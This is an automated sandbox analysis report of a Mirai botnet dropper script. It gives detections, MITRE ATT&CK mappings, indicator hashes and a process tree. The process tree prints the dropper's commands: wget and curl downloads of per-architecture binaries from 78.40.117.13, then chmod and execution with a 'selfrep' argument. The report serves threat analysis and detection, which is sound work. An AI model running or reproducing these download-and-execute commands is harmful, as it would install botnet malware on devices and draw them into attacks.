mirai | 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8

Analysis

max time kernel
144s
max time network
145s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
12/03/2025, 03:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
Size

2KB
MD5

62cb91c4ef22637c8ad25733622c1481
SHA1

a71f4c34d11d81505a2dca56ce349d2e077b30aa
SHA256

99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8
SHA512

2d033be2e64ec61c2f33c570c1cdab01da2dba5778ed65e69301c42858d0e6cd8d6f6faac86fdb14f5587225e3d49842d5401ef2102058b2c55c42e0e088d2e8

Score

10^/10

mirai unstable antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
814	chmod
822	chmod
827	chmod
833	chmod
691	chmod
705	chmod
724	chmod
742	chmod
760	chmod
769	chmod
802	chmod
808	chmod
682	chmod

Deletes itself 2 IoCs

pid	Process
726	WTH
770	WTH

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/WTH	683	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	692	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	707	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	726	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	743	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	761	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	770	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	803	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	809	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	815	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	823	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	828	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/WTH	834	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTH
File opened for modification	/dev/misc/watchdog	WTH
File opened for modification	/dev/watchdog	WTH
File opened for modification	/dev/misc/watchdog	WTH

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	WTH

Writes file to system bin folder 4 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTH
File opened for modification	/bin/watchdog	WTH
File opened for modification	/sbin/watchdog	WTH
File opened for modification	/bin/watchdog	WTH

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	hrckt4d7c4db0klg	726	WTH
Changes the process name, possibly in an attempt to hide itself	b4bq6okmskj3	770	WTH

Checks CPU configuration 1 TTPs 13 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	WTH

Reads runtime system information 32 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/maps	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	WTH
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	WTH
File opened for reading	/proc/self/maps	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	WTH
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
686	wget
689	curl
690	cat

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/EdiAf.m68k	wget
File opened for modification	/tmp/EdiAf.i686	curl
File opened for modification	/tmp/EdiAf.sh4	wget
File opened for modification	/tmp/EdiAf.sh4	curl
File opened for modification	/tmp/EdiAf.x86	curl
File opened for modification	/tmp/EdiAf.mpsl	wget
File opened for modification	/tmp/EdiAf.ppc	curl
File opened for modification	/tmp/EdiAf.mips	curl
File opened for modification	/tmp/EdiAf.mpsl	curl
File opened for modification	/tmp/EdiAf.arm	wget
File opened for modification	/tmp/EdiAf.arm	curl
File opened for modification	/tmp/EdiAf.arm6	wget
File opened for modification	/tmp/EdiAf.arc	curl
File opened for modification	/tmp/EdiAf.x86	wget
File opened for modification	/tmp/EdiAf.mips	wget
File opened for modification	/tmp/EdiAf.arm5	wget
File opened for modification	/tmp/EdiAf.arm6	curl
File opened for modification	/tmp/EdiAf.arm7	wget
File opened for modification	/tmp/EdiAf.m68k	curl
File opened for modification	/tmp/EdiAf.spc	wget
File opened for modification	/tmp/EdiAf.spc	curl
File opened for modification	/tmp/WTH	99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
File opened for modification	/tmp/EdiAf.arm5	curl
File opened for modification	/tmp/EdiAf.arm7	curl
File opened for modification	/tmp/EdiAf.ppc	wget

/tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
/tmp/99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:652
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.x86
  2⤵
  - Writes file to tmp directory
  PID:654
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:671
- /bin/cat
  cat EdiAf.x86
  2⤵
  PID:680
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:683
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:686
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:689
- /bin/cat
  cat EdiAf.mips
  2⤵
  - System Network Configuration Discovery
  PID:690
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:692
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Writes file to tmp directory
  PID:694
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/cat
  cat EdiAf.mpsl
  2⤵
  PID:704
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:705
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:707
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:716
- /bin/cat
  cat EdiAf.arm
  2⤵
  PID:723
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  - Deletes itself
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  - Reads runtime system information
  PID:726
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm5
  2⤵
  - Writes file to tmp directory
  PID:728
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat EdiAf.arm5
  2⤵
  PID:741
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  - Reads runtime system information
  PID:743
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm6
  2⤵
  - Writes file to tmp directory
  PID:744
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/cat
  cat EdiAf.arm6
  2⤵
  PID:759
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  - Reads runtime system information
  PID:761
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arm7
  2⤵
  - Writes file to tmp directory
  PID:762
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:763
- /bin/cat
  cat EdiAf.arm7
  2⤵
  PID:767
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  - Deletes itself
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:770
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.ppc
  2⤵
  - Writes file to tmp directory
  PID:798
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:800
- /bin/cat
  cat EdiAf.ppc
  2⤵
  PID:801
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:803
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.m68k
  2⤵
  - Writes file to tmp directory
  PID:805
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/cat
  cat EdiAf.m68k
  2⤵
  PID:807
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:809
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.spc
  2⤵
  - Writes file to tmp directory
  PID:811
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.spc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/cat
  cat EdiAf.spc
  2⤵
  PID:813
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:815
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.i686
  2⤵
  PID:817
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:819
- /bin/cat
  cat EdiAf.i686
  2⤵
  PID:821
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:823
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.sh4
  2⤵
  - Writes file to tmp directory
  PID:824
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:825
- /bin/cat
  cat EdiAf.sh4
  2⤵
  PID:826
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:828
- /usr/bin/wget
  wget http://78.40.117.13/EdiAf.arc
  2⤵
  PID:830
- /usr/bin/curl
  curl -O http://78.40.117.13/EdiAf.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:831
- /bin/cat
  cat EdiAf.arc
  2⤵
  PID:832
- /bin/chmod
  chmod +x 99141091152cc9f260fb3bcb4112540e2939ea0d2ef3d0909b705de7656e4ca8.sh EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-GdhaNQ WTH
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /tmp/WTH
  ./WTH pulse.selfrep
  2⤵
  PID:834

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/EdiAf.x86

Filesize
30KB

MD5
e932653d32b429c51de2046623fa71d2

SHA1
32ecc535e6cf6e99f105835d4a7cb75ef4cb233a

SHA256
87dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612

SHA512
e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2

Download Submit
/tmp/WTH

Filesize
33KB

MD5
029a7185777b7f885a6c3807e46b7365

SHA1
87372b0029b72446861c7b429e3ef1626c337218

SHA256
42c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d

SHA512
4890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8

Download Submit
/tmp/WTH

Filesize
35KB

MD5
7327f58c0e15f6086301a81780e100dc

SHA1
292bb04ad4df407ac687ef1df1071659708bd3bb

SHA256
b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d

SHA512
4cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911

Download Submit
/tmp/WTH

Filesize
32KB

MD5
addb1cd662dd870b9b7ed5273d6fa76e

SHA1
6e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0

SHA256
cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7

SHA512
28525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f

Download Submit
/tmp/WTH

Filesize
21KB

MD5
a117b1b367633cb07f0795bd5f0c6f8f

SHA1
32bfac42c7134383c6381b94c0d75317fcb56d11

SHA256
40fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0

SHA512
7e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726

Download Submit
/tmp/WTH

Filesize
75KB

MD5
642dff628df548a6c458f004fd3b5aa1

SHA1
cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7

SHA256
219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed

SHA512
dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads